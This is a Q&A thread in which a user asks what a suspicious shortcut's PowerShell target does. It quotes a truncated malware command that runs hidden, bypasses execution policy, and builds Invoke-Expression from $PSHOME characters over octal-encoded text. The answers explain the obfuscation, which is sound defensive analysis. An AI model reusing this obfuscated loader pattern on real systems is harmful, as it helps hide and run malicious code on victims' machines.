# Powershell Join Puzzle

Tags: powershell, powershell-3.0

Does anyone know what the following powerhshell do? I found a shortcut that seems malicious and its target is:

```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
```

Comment: this does look suspicous. to inspect what it does you have to paste the full command (seems to be cut off). there was a talk about obfuscation at PSConfEU this year: https://www.youtube.com/watch?v=UVbbpZiYnTs

Comment: Oh no. I didn't notice. I deleted the link and re-imaged my machine to return it into its original clean state.

Answer (score 1, accepted):

See my other [answer](https://stackoverflow.com/questions/53128098/malware-using-lnk-file-to-powershell/53129244#53129244). Compare to the other [answer](https://stackoverflow.com/questions/53128098/malware-using-lnk-file-to-powershell/53129244#53129244) the `iex` (=Invoke-Expression) is build via the `$PSHOME` variable (= `$pshOmE[4]+$PShoMe[30]+'X'`). The numbers in the join command may either contain extended ASCII characters, or they might be a `Base64` encoded command, which can be used in the form via `powershell.exe -encodedCommand $encodedCommand` ( type `powershell.exe /?`, and will dump an example).

Hope that helps